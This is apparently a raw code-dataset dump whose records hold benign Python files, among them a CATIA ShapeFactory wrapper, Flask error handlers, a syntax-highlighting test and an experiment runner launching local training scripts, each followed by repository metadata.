def add_new_user_pattern(self, i_shape_to_copy: AnyObject, i_nb_of_copies: int) -> UserPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewUserPattern(AnyObject iShapeToCopy,
| long iNbOfCopies) As UserPattern
|
| Creates and returns a new user pattern within the current
| body.
|
| Parameters:
|
| iShapeToCopy
| The shape to be copied by the user pattern
| iNbOfCopies
| The number of times iShapeToCopy will be copied
|
| Returns:
| The created user pattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies:
:return: UserPattern
:rtype: UserPattern
"""
return UserPattern(self.shape_factory.AddNewUserPattern(i_shape_to_copy.com_object, i_nb_of_copies))
def add_new_user_patternof_list(self, i_shape_to_copy: AnyObject, i_nb_of_copies: int) -> UserPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewUserPatternofList(AnyObject iShapeToCopy,
| long iNbOfCopies) As UserPattern
|
| V5R8 Only: Creates and returns a new user pattern within the current body
| using a list of shapes.
|
| Parameters:
|
| iShapeToCopy
| The shape to be copied by the user pattern Others shapes will be
| add by put_ItemToCopy with CATIAPattern interface
| iNbOfCopies
| The number of times iShapeToCopy will be copied
|
| Returns:
| The created user pattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies:
:return: UserPattern
:rtype: UserPattern
"""
return UserPattern(self.shape_factory.AddNewUserPatternofList(i_shape_to_copy.com_object, i_nb_of_copies))
def add_new_volume_add(self, i_body1: Reference, i_body2: Reference, i_type: float) -> Add:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumeAdd(Reference iBody1,
| Reference iBody2,
| double iType) As Add
|
| Creates and returns a Volumic Add feature.
|
| Parameters:
|
| iBody1
| The volume or body to be modified.
| iBody2
| The volume or body to be operated.
| iType
| iType = 0 if Part Design, = 4 if GSD.
|
| Returns:
| The created Volumic Add feature.
:param Reference i_body1:
:param Reference i_body2:
:param float i_type:
:return: Add
:rtype: Add
"""
return Add(self.shape_factory.AddNewVolumeAdd(i_body1.com_object, i_body2.com_object, i_type))
def add_new_volume_close_surface(self, i_close_element: Reference) -> CloseSurface:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumeCloseSurface(Reference iCloseElement) As
| CloseSurface
|
| Creates and returns a new VolumeCloseSurface feature.
|
| Parameters:
|
| iCloseElement
| The skin that will be closed and add with the current body
|
|
| Returns:
| The created CloseSurface feature
:param Reference i_close_element:
:return: CloseSurface
:rtype: CloseSurface
"""
return CloseSurface(self.shape_factory.AddNewVolumeCloseSurface(i_close_element.com_object))
def add_new_volume_intersect(self, i_body1: Reference, i_body2: Reference, i_type: float) -> Intersect:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumeIntersect(Reference iBody1,
| Reference iBody2,
| double iType) As Intersect
|
| Creates and returns a Volumic Intersect feature.
|
| Parameters:
|
| iBody1
| The volume or body to be modified.
| iBody2
| The volume or body to be operated.
| iType
| iType = 0 if Part Design, = 4 if GSD.
|
| Returns:
| The created Volumic Intersect feature.
:param Reference i_body1:
:param Reference i_body2:
:param float i_type:
:return: Intersect
:rtype: Intersect
"""
return Intersect(self.shape_factory.AddNewVolumeIntersect(i_body1.com_object, i_body2.com_object, i_type))
def add_new_volume_remove(self, i_body1: Reference, i_body2: Reference, i_type: float) -> Remove:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumeRemove(Reference iBody1,
| Reference iBody2,
| double iType) As Remove
|
| Creates and returns a Volumic Remove feature.
|
| Parameters:
|
| iBody1
| The volume or body to be modified.
| iBody2
| The volume or body to be operated.
| iType
| iType = 0 if Part Design, = 4 if GSD.
|
| Returns:
| The created Volumic Remove feature.
:param Reference i_body1:
:param Reference i_body2:
:param float i_type:
:return: Remove
:rtype: Remove
"""
return Remove(self.shape_factory.AddNewVolumeRemove(i_body1.com_object, i_body2.com_object, i_type))
def add_new_volume_sew_surface(self, i_type: int, i_support_volume: Reference, i_sewing_element: Reference,
i_sewing_side: int) -> SewSurface:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumeSewSurface(long iType,
| Reference iSupportVolume,
| Reference iSewingElement,
| CatSplitSide iSewingSide) As SewSurface
|
| Creates and returns a new volume sewing operation within the current
| OGS/GS.
|
| Parameters:
|
| iType
| Parameter to determine the sewing type. For Volume sewing Type = 4
| iSupportVolume
| The volume support on which sew operation will be performed
|
| iSewingElement
| The face or skin or surface that will be sewn on the current volume
| support
| iSewingSide
| The specification for which side of the current volume should be
| kept at the end of the sewing operation
|
| Returns:
| The created sewing operation
:param int i_type:
:param Reference i_support_volume:
:param Reference i_sewing_element:
:param int i_sewing_side:
:return: SewSurface
:rtype: SewSurface
"""
return SewSurface(
self.shape_factory.AddNewVolumeSewSurface(i_type, i_support_volume.com_object, i_sewing_element.com_object,
i_sewing_side))
def add_new_volume_shell(self, i_face_to_remove: Reference, i_internal_thickness: float,
i_external_thickness: float, i_volume_support: Reference) -> Shell:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumeShell(Reference iFaceToRemove,
| double iInternalThickness,
| double iExternalThickness,
| Reference iVolumeSupport) As Shell
|
| Creates and returns a Volumic Shell feature.
|
| Parameters:
|
| iFacesToRemove
| The Faces of the Volume
| iFacesToThicken
| The Faces of the Volume
| iInternalThickness
| The thickness of material to be added on the internal side of all
| the faces during the shell process, except for those to be removed
|
| iExternaThickness
| The thickness of material to be added on the external side of all
| the faces during the shell process, except for those to be removed
|
| iVolumeSupport
| The Volume related the faces to remove and faces to thicken
|
|
| Returns:
| The created Volumic Shell.
:param Reference i_face_to_remove:
:param float i_internal_thickness:
:param float i_external_thickness:
:param Reference i_volume_support:
:return: Shell
:rtype: Shell
"""
return Shell(self.shape_factory.AddNewVolumeShell(i_face_to_remove.com_object, i_internal_thickness,
i_external_thickness, i_volume_support.com_object))
def add_new_volume_thick_surface(self, i_offset_element: Reference, i_isens_offset: int, i_top_offset: float,
i_bot_offset: float) -> ThickSurface:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumeThickSurface(Reference iOffsetElement,
| long iIsensOffset,
| double iTopOffset,
| double iBotOffset) As ThickSurface
|
| Creates and returns a new VolumeThickSurface feature.
|
| Parameters:
|
| iOffsetElement
| The skin that will be thicken and added with the current OGS/GS
|
| iIsensOffset
| The direction of the offset in regard to the direction of the
| normal
| iTopOffset
| The Offset between the iOffsetElement and the upper skin of the
| resulting feature
| iBotOffset
| The Offset between the iOffsetElement and the lower skin of the
| resulting feature
|
| Returns:
| The created ThickSurface feature
:param Reference i_offset_element:
:param int i_isens_offset:
:param float i_top_offset:
:param float i_bot_offset:
:return: ThickSurface
:rtype: ThickSurface
"""
return ThickSurface(
self.shape_factory.AddNewVolumeThickSurface(i_offset_element.com_object, i_isens_offset, i_top_offset,
i_bot_offset))
def add_new_volume_thickness(self, i_face_to_thicken: Reference, i_offset: float, i_type: int,
i_volume_support: Reference) -> Thickness:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumeThickness(Reference iFaceToThicken,
| double iOffset,
| long iType,
| Reference iVolumeSupport) As Thickness
|
| Creates and returns a volume new thickness within the current GS or
| OGS.
|
| Parameters:
|
| iFaceToThicken
| The first face to thicken in the thickening
| process.
| New faces to thicken can be added to the thickness afterwards by
| using methods offered by the created thickness
| The following
|
| Boundary object is supported: Face.
| iOffset
| The thickness of material to be added on the external side of the face
| iFaceToThicken during the thickening process
| iType
| The mode of thickness creation (4=Volume)
| iVolumeSupport
| The support volume for volumic draft
| Returns:
| The created thickness
:param Reference i_face_to_thicken:
:param float i_offset:
:param int i_type:
:param Reference i_volume_support:
:return: Thickness
:rtype: Thickness
"""
return Thickness(self.shape_factory.AddNewVolumeThickness(i_face_to_thicken.com_object, i_offset, i_type,
i_volume_support.com_object))
def add_new_volume_trim(self, i_support_volume: Reference, i_cutting_volume: Reference) -> Trim:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumeTrim(Reference iSupportVolume,
| Reference iCuttingVolume) As Trim
|
| Creates and returns a new Volume Trim operation within the
| GS/OGS.
|
| Parameters:
|
| iSupportVolume
| The Support Volume
| iCutttingVolume
| The trimming Volume
|
| Returns:
| The created Trim operation
:param Reference i_support_volume:
:param Reference i_cutting_volume:
:return: Trim
:rtype: Trim
"""
return Trim(self.shape_factory.AddNewVolumeTrim(i_support_volume.com_object, i_cutting_volume.com_object))
def add_new_volumic_draft(self, i_face_to_draft: Reference, i_neutral: Reference, i_neutral_mode: int,
i_parting: Reference, i_dir_x: float, i_dir_y: float, i_dir_z: float, i_mode: int,
i_angle: float, i_multiselection_mode: int, i_type: int,
i_volume_support: Reference) -> Draft:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewVolumicDraft(Reference iFaceToDraft,
| Reference iNeutral,
| CatDraftNeutralPropagationMode iNeutralMode,
| Reference iParting,
| double iDirX,
| double iDirY,
| double iDirZ,
| CatDraftMode iMode,
| double iAngle,
| CatDraftMultiselectionMode iMultiselectionMode,
| long iType,
| Reference iVolumeSupport) As Draft
|
| Creates and returns a new volume draft within the current
| body.
| The draft needs a reference face on the body. This face will remain
| unchanged in the draft operation, while faces adjacent to it and specified for
| drafting will be rotated by the draft angle.
|
| Parameters:
|
| iFaceToDraft
| The first face to draft in the body. This face should be adjacent
| to the iFaceToDraft face. If several faces are to be drafted, only the first
| one is specified here, the others being inferred by propagating the draft
| operation onto faces adjacent to this first face. This is controlled by the
| iNeutralMode argument.
| The following
|
| Boundary object is supported: Face.
| iNeutral
| The reference face for the draft. The draft needs a reference face on
| the body, that will remain unchanged in the draft operation, while faces
| adjacent to it and specified for drafting will be rotated according to the
| draft angle iAngle.
| The following Boundary object is supported:
| PlanarFace.
| iNeutralMode
| Controls if and how the drafting operation should be propagated beyond
| the first face to draft iFaceToDraft to other adjacent faces.
|
| iParting
| The draft parting plane, face or surface. It specifies the element
| within the body to draft that represents the bottom of the mold. This element
| can be located either somewhere in the middle of the body or be one of its
| boundary faces. When located in the middle of the body, it crosses the faces to
| draft, and as a result, those faces are drafted with a positive angle on one
| side of the parting surface, and with a negative angle on the other
| side.
| The following Boundary object is supported:
| PlanarFace.
| iDirX,iDirY,iDirZ
| The X, Y, and Z components of the absolute vector representing the
| drafting direction (i.e. the mold extraction direction).
|
| iMode
| The draft connecting mode to its reference face iFaceToDraft
|
| iAngle
| The draft angle
| iMultiselectionMode.
| The elements to be drafted can be selected explicitly or can implicitly
| selected as neighbors of the neutral face
| iType
| The mode of draft creation (4=Volume)
| iVolumeSupport
| The support volume for volumic draft
| Returns:
| The created draft
:param Reference i_face_to_draft:
:param Reference i_neutral:
:param int i_neutral_mode:
:param Reference i_parting:
:param float i_dir_x:
:param float i_dir_y:
:param float i_dir_z:
:param int i_mode:
:param float i_angle:
:param int i_multiselection_mode:
:param int i_type:
:param Reference i_volume_support:
:return: Draft
:rtype: Draft
"""
return Draft(
self.shape_factory.AddNewVolumicDraft(i_face_to_draft.com_object, i_neutral.com_object, i_neutral_mode,
i_parting.com_object, i_dir_x, i_dir_y, i_dir_z, i_mode, i_angle,
i_multiselection_mode, i_type, i_volume_support.com_object))
    def __repr__(self):
        """Return a debug representation carrying the factory's name."""
        return f'ShapeFactory(name="{self.name}")'
| 45.805043
| 120
| 0.507703
| 14,561
| 156,241
| 5.265572
| 0.053911
| 0.023346
| 0.019368
| 0.017947
| 0.810152
| 0.786089
| 0.767321
| 0.7467
| 0.733175
| 0.707742
| 0
| 0.025226
| 0.44384
| 156,241
| 3,410
| 121
| 45.818475
| 0.857126
| 0.648524
| 0
| 0.26703
| 1
| 0
| 0.000976
| 0.000976
| 0
| 0
| 0
| 0
| 0
| 1
| 0.234332
| false
| 0
| 0.114441
| 0.002725
| 0.583106
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
3e447589b301226bc8ba12fb053079bed8a7d442
| 582
|
py
|
Python
|
test/expressions/expr2.py
|
kylebarron/MagicPython
|
da6fa0793e2c85d3bf7709ff1d4f65ccf468db11
|
[
"MIT"
] | 1,482
|
2015-10-16T21:59:32.000Z
|
2022-03-30T11:44:40.000Z
|
test/expressions/expr2.py
|
kylebarron/MagicPython
|
da6fa0793e2c85d3bf7709ff1d4f65ccf468db11
|
[
"MIT"
] | 226
|
2015-10-15T15:53:44.000Z
|
2022-03-25T03:08:27.000Z
|
test/expressions/expr2.py
|
kylebarron/MagicPython
|
da6fa0793e2c85d3bf7709ff1d4f65ccf468db11
|
[
"MIT"
] | 129
|
2015-10-20T02:41:49.000Z
|
2022-03-22T01:44:36.000Z
|
a @= b
a -= c
a ^= d
a : source.python
: source.python
@= : keyword.operator.assignment.python, source.python
: source.python
b : source.python
a : source.python
: source.python
-= : keyword.operator.assignment.python, source.python
: source.python
c : source.python
a : source.python
: source.python
^= : keyword.operator.assignment.python, source.python
: source.python
d : source.python
| 26.454545
| 65
| 0.489691
| 54
| 582
| 5.277778
| 0.166667
| 0.631579
| 0.568421
| 0.505263
| 0.926316
| 0.926316
| 0.926316
| 0.926316
| 0.926316
| 0.926316
| 0
| 0
| 0.417526
| 582
| 21
| 66
| 27.714286
| 0.840708
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
3e5c285241f7be9fcf2ec9e1b686146949e81ccf
| 444
|
py
|
Python
|
flaskapp/error/handlers.py
|
anuj-s1ngh/Flask-Blog-App
|
97db7ebcd9ead76d5cfd43b75a09b93d0c9c9cfd
|
[
"MIT"
] | null | null | null |
flaskapp/error/handlers.py
|
anuj-s1ngh/Flask-Blog-App
|
97db7ebcd9ead76d5cfd43b75a09b93d0c9c9cfd
|
[
"MIT"
] | null | null | null |
flaskapp/error/handlers.py
|
anuj-s1ngh/Flask-Blog-App
|
97db7ebcd9ead76d5cfd43b75a09b93d0c9c9cfd
|
[
"MIT"
] | null | null | null |
from flask import Blueprint, render_template

# Blueprint grouping the application-wide HTTP error pages.
error_blueprint = Blueprint('error_blueprint', __name__)


@error_blueprint.app_errorhandler(404)
def error_404(error):
    """Render the custom page for 404 Not Found."""
    page = render_template('error/404.html')
    return page, 404


@error_blueprint.app_errorhandler(403)
def error_403(error):
    """Render the custom page for 403 Forbidden."""
    page = render_template('error/403.html')
    return page, 403


@error_blueprint.app_errorhandler(500)
def error_500(error):
    """Render the custom page for 500 Internal Server Error."""
    page = render_template('error/500.html')
    return page, 500
| 21.142857
| 56
| 0.781532
| 60
| 444
| 5.466667
| 0.266667
| 0.213415
| 0.231707
| 0.265244
| 0.27439
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 0.108108
| 444
| 20
| 57
| 22.2
| 0.737374
| 0
| 0
| 0
| 0
| 0
| 0.128668
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.272727
| false
| 0
| 0.090909
| 0.272727
| 0.636364
| 0.454545
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
|
0
| 7
|
e4b3b82761776eacfad311029cd67e6a4edd43ff
| 51
|
py
|
Python
|
recipes/recipes_emscripten/msgpack/test_import_msgpack.py
|
emscripten-forge/recipes
|
62cb3e146abc8945ac210f38e4e47c080698eae5
|
[
"MIT"
] | 1
|
2022-03-10T16:50:56.000Z
|
2022-03-10T16:50:56.000Z
|
recipes/recipes_emscripten/msgpack/test_import_msgpack.py
|
emscripten-forge/recipes
|
62cb3e146abc8945ac210f38e4e47c080698eae5
|
[
"MIT"
] | 9
|
2022-03-18T09:26:38.000Z
|
2022-03-29T09:21:51.000Z
|
recipes/recipes_emscripten/msgpack/test_import_msgpack.py
|
emscripten-forge/recipes
|
62cb3e146abc8945ac210f38e4e47c080698eae5
|
[
"MIT"
] | null | null | null |
def test_import_msgpack():
    """Smoke test: the msgpack package can be imported in this environment."""
    import msgpack  # noqa: F401 -- the import itself is the assertion
| 12.75
| 26
| 0.686275
| 6
| 51
| 5.5
| 0.666667
| 0.787879
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.254902
| 51
| 4
| 27
| 12.75
| 0.868421
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 1
| 0
| 1.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e4b9b2f574b11a36fbd7dd2a71f53899fc586fe4
| 133
|
py
|
Python
|
textclf/utils/ml_data.py
|
lswjkllc/textclf
|
e4e7504989dd5d39c9376eafda1abc580c053913
|
[
"MIT"
] | 146
|
2020-02-20T02:29:55.000Z
|
2022-01-21T09:49:40.000Z
|
textclf/utils/ml_data.py
|
lswjkllc/textclf
|
e4e7504989dd5d39c9376eafda1abc580c053913
|
[
"MIT"
] | 4
|
2020-03-08T03:24:16.000Z
|
2021-03-26T05:34:09.000Z
|
textclf/utils/ml_data.py
|
lswjkllc/textclf
|
e4e7504989dd5d39c9376eafda1abc580c053913
|
[
"MIT"
] | 16
|
2020-02-26T04:45:40.000Z
|
2021-05-08T03:52:38.000Z
|
from .raw_data import load_raw_data
def prepare_ml_input(joblib_path, VectorizerConfig):
    """Load serialized raw data as the first step of building ML model input.

    :param joblib_path: path to the serialized raw-data file, forwarded to
        ``load_raw_data``.
    :param VectorizerConfig: vectorizer configuration; unused in the visible
        portion of this function -- presumably consumed further down, verify
        against the full source.
    """
    raw_data = load_raw_data(joblib_path)
| 22.166667
| 52
| 0.819549
| 21
| 133
| 4.714286
| 0.571429
| 0.282828
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.120301
| 133
| 5
| 53
| 26.6
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8409e7c3c01e70319cb676588410bb2d7aa90b35
| 85
|
py
|
Python
|
runbox/scoring/__init__.py
|
burenotti/runbox
|
73a24764750544a37738605f66bad91f8c4cb31c
|
[
"MIT"
] | null | null | null |
runbox/scoring/__init__.py
|
burenotti/runbox
|
73a24764750544a37738605f66bad91f8c4cb31c
|
[
"MIT"
] | null | null | null |
runbox/scoring/__init__.py
|
burenotti/runbox
|
73a24764750544a37738605f66bad91f8c4cb31c
|
[
"MIT"
] | null | null | null |
# Package facade: re-export the scoring submodules' public names so callers
# can simply ``from runbox.scoring import ...``.
from .proto import *
from .scoring_system import *
from .scoring_strategies import *
| 21.25
| 33
| 0.788235
| 11
| 85
| 5.909091
| 0.545455
| 0.307692
| 0.523077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141176
| 85
| 3
| 34
| 28.333333
| 0.890411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ffdaf54ddaaf5eeed53c12c82602d54fc45540e1
| 94
|
py
|
Python
|
app/v1/businesses/__init__.py
|
daktari01/we_connect
|
2045becd9c0cddaeeeb47e5eff9dc712fd87c1d0
|
[
"MIT"
] | 1
|
2018-12-14T10:41:19.000Z
|
2018-12-14T10:41:19.000Z
|
app/v1/businesses/__init__.py
|
daktari01/we_connect
|
2045becd9c0cddaeeeb47e5eff9dc712fd87c1d0
|
[
"MIT"
] | 4
|
2018-03-04T09:46:35.000Z
|
2018-06-10T05:49:37.000Z
|
app/v1/businesses/__init__.py
|
daktari01/we_connect
|
2045becd9c0cddaeeeb47e5eff9dc712fd87c1d0
|
[
"MIT"
] | 2
|
2018-03-08T08:24:05.000Z
|
2018-06-03T20:59:54.000Z
|
from flask import Blueprint

# Blueprint grouping the v1 businesses endpoints.
busy_v1 = Blueprint('busy_v1', __name__)

# Imported at the bottom deliberately: views needs busy_v1 to register its
# routes, so a top import would create a circular import.
from . import views
| 10.444444
| 40
| 0.744681
| 13
| 94
| 4.923077
| 0.615385
| 0.40625
| 0.46875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025974
| 0.180851
| 94
| 8
| 41
| 11.75
| 0.805195
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
ffffd549d92b9cade2b1e801abe40f541e533ba7
| 1,692
|
py
|
Python
|
Experiments/STMeta/Runner_PS_Shanghai.py
|
nj-czy/UCTB
|
bddb8b47953bef1f44cb06f1a57a3d7efbd31c3a
|
[
"MIT"
] | 28
|
2020-02-28T03:16:43.000Z
|
2022-03-31T07:24:47.000Z
|
Experiments/STMeta/Runner_PS_Shanghai.py
|
nj-czy/UCTB
|
bddb8b47953bef1f44cb06f1a57a3d7efbd31c3a
|
[
"MIT"
] | 8
|
2020-06-30T09:34:56.000Z
|
2022-01-17T12:20:28.000Z
|
Experiments/STMeta/Runner_PS_Shanghai.py
|
nj-czy/UCTB
|
bddb8b47953bef1f44cb06f1a57a3d7efbd31c3a
|
[
"MIT"
] | 13
|
2020-06-04T09:47:36.000Z
|
2022-02-25T09:50:52.000Z
|
import os

############################################################################################################
# Enrich gcn_k
############################################################################################################

# Grid search over gcn_k in {1, 2, 3} for each batch size in {16, 32, 64}.
# The runs are numbered PS1..PS9 in exactly the order the original
# copy-pasted commands used: gcn_k varies fastest, batch_size slowest.
COMMAND_TEMPLATE = (
    'python STMeta_Obj.py -m STMeta_v1.model.yml -d metro_shanghai.data.yml -p '
    'gcn_k:{gcn_k},gcn_layers:1,gclstm_layers:1,batch_size:{batch_size},mark:PS{run}'
)


def build_command(gcn_k, batch_size, run):
    """Return the shell command for one (gcn_k, batch_size) experiment.

    :param gcn_k: order of the graph convolution (1, 2 or 3).
    :param batch_size: training batch size (16, 32 or 64).
    :param run: 1-based run index used for the PS<run> mark.
    """
    return COMMAND_TEMPLATE.format(gcn_k=gcn_k, batch_size=batch_size, run=run)


run = 0
for batch_size in (16, 32, 64):
    for gcn_k in (1, 2, 3):
        run += 1
        os.system(build_command(gcn_k, batch_size, run))
| 52.875
| 108
| 0.63357
| 284
| 1,692
| 3.549296
| 0.137324
| 0.125
| 0.125
| 0.178571
| 0.955357
| 0.955357
| 0.955357
| 0.955357
| 0.955357
| 0.955357
| 0
| 0.04186
| 0.11052
| 1,692
| 32
| 109
| 52.875
| 0.627907
| 0.007092
| 0
| 0.473684
| 0
| 0
| 0.818182
| 0.504443
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.052632
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f2a2a5539fc0796a2f93928a5e20dd79bbebd734
| 194
|
py
|
Python
|
python/simplepvr/simple_pvr/__init__.py
|
olefriis/simplepvr
|
8047d0f0de8caafcea89fbc42337273e34ed101c
|
[
"WTFPL"
] | 5
|
2015-01-27T01:11:36.000Z
|
2022-03-22T20:54:55.000Z
|
python/simplepvr/simple_pvr/__init__.py
|
olefriis/simplepvr
|
8047d0f0de8caafcea89fbc42337273e34ed101c
|
[
"WTFPL"
] | null | null | null |
python/simplepvr/simple_pvr/__init__.py
|
olefriis/simplepvr
|
8047d0f0de8caafcea89fbc42337273e34ed101c
|
[
"WTFPL"
] | null | null | null |
__author__ = 'frj'
#__name__ = 'simple_pvr'

# Package facade: surface the main components (all routed through
# master_import) plus everything public from the server module.
from .master_import import HDHomeRun
from .master_import import RecordingManager
from .master_import import RecordingPlanner
from .server import *
| 19.4
| 43
| 0.809278
| 23
| 194
| 6.304348
| 0.521739
| 0.206897
| 0.331034
| 0.455172
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128866
| 194
| 9
| 44
| 21.555556
| 0.857988
| 0.118557
| 0
| 0
| 0
| 0
| 0.017751
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f2a3cb022f0fd2334a587580a9547811185da382
| 115
|
py
|
Python
|
python/apollocaffe/layers/__init__.py
|
kranthisai/apollocaffe-pi
|
415ff96e9825f39ad33fa7d4686c9560d9b359f8
|
[
"BSD-2-Clause"
] | 3
|
2017-03-27T17:07:36.000Z
|
2022-01-31T18:18:44.000Z
|
python/apollocaffe/layers/__init__.py
|
LihangLiu93/apollocaffe
|
df44c36295b6ec6db9a336508a2b378e04e5be0b
|
[
"BSD-2-Clause"
] | 1
|
2019-01-26T19:15:04.000Z
|
2019-01-26T19:15:04.000Z
|
python/apollocaffe/layers/__init__.py
|
LihangLiu93/apollocaffe
|
df44c36295b6ec6db9a336508a2b378e04e5be0b
|
[
"BSD-2-Clause"
] | 6
|
2016-08-01T18:19:13.000Z
|
2020-02-19T04:51:52.000Z
|
# Public layer API: every caffe and python layer wrapper, plus the
# Filler/Transform/CaffeFiller helpers used when configuring layers.
from .caffe_layers import *
from .python_layers import *
from .layer_helpers import Filler, Transform, CaffeFiller
| 28.75
| 57
| 0.817391
| 15
| 115
| 6.066667
| 0.666667
| 0.263736
| 0.351648
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121739
| 115
| 3
| 58
| 38.333333
| 0.90099
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f2a8939e4956ca98c4dd08d5fd548b94e4103eb8
| 319
|
py
|
Python
|
tests/deephyper/search/nas/test_agebo_cli.py
|
felixeperez/deephyper
|
23c720d19ed9510ca121b41196b5cc8ec4cd0ba9
|
[
"BSD-3-Clause"
] | 185
|
2018-11-06T18:49:47.000Z
|
2022-03-31T22:10:41.000Z
|
tests/deephyper/search/nas/test_agebo_cli.py
|
felixeperez/deephyper
|
23c720d19ed9510ca121b41196b5cc8ec4cd0ba9
|
[
"BSD-3-Clause"
] | 108
|
2018-12-17T17:58:05.000Z
|
2022-03-16T10:22:08.000Z
|
tests/deephyper/search/nas/test_agebo_cli.py
|
felixeperez/deephyper
|
23c720d19ed9510ca121b41196b5cc8ec4cd0ba9
|
[
